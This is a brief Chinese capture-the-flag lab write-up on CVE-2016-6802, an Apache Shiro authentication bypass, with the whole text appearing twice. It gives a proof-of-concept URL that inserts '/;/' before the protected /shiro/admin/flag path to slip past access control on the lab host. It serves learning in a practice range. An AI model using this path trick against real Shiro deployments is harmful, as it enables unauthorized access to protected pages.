春秋云境CVE-2016-6802
1.阅读靶场介绍
简单来说就是通过构造特殊路径
去访问目的地址
2.启动靶场
如下图所示
这里我们能想到的就是在
/shiro/admin/flag
但是得想办法绕过
3.poc
访问如下url既可以绕过
https://eci-2zeb58vwoc111mzmqg1z.cloudeci1.ichunqiu.com:8080/;/shiro/admin/flag
一键获取完整项目代码
相信各位也完成夺旗了
希望大家能够喜欢我的文章
感谢您宝贵的时间
1.阅读靶场介绍
简单来说就是通过构造特殊路径
去访问目的地址
2.启动靶场
如下图所示
这里我们能想到的就是在
/shiro/admin/flag
但是得想办法绕过
3.poc
访问如下url既可以绕过
https://eci-2zeb58vwoc111mzmqg1z.cloudeci1.ichunqiu.com:8080/;/shiro/admin/flag
一键获取完整项目代码
相信各位也完成夺旗了
希望大家能够喜欢我的文章
感谢您宝贵的时间